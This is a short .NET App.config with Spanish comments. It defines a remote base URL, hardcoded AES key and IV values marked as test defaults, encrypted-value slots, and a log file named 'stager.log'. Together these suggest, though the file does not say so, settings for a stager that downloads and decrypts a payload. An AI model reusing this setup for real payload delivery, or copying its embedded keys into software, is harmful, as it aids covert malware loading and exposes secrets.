<?xml version=\"1.0\" encoding=\"utf-8\" ?>
<configuration>
    <startup> 
        <supportedRuntime version=\"v4.0\" sku=\".NETFramework,Version=v4.7.2\" />
    </startup>
    <appSettings>
        <!-- Estos valores están cifrados, no utilizar directamente -->
        <add key="EncryptedBaseUrl" value="" />
        <add key="EncryptedAESKey" value="" />
        <add key="EncryptedAESIV" value="" />
        <!-- Valores por defecto para pruebas (se recomienda dejar en blanco en producción) -->
        <add key="BaseUrl" value="https://www.tecnologico.org/d2fc1b6a458f" />
        <add key="AESKey" value="9ae0c8e048d89fb3" />
        <add key="AESIV" value="789ca1a73299c6e0" />
        <!-- Opciones de configuración -->
        <add key="UseEncryptedValues" value="false" />
        <add key="LoggingEnabled" value="false" />
        <add key="LogPath" value="stager.log" />
    </appSettings>
</configuration>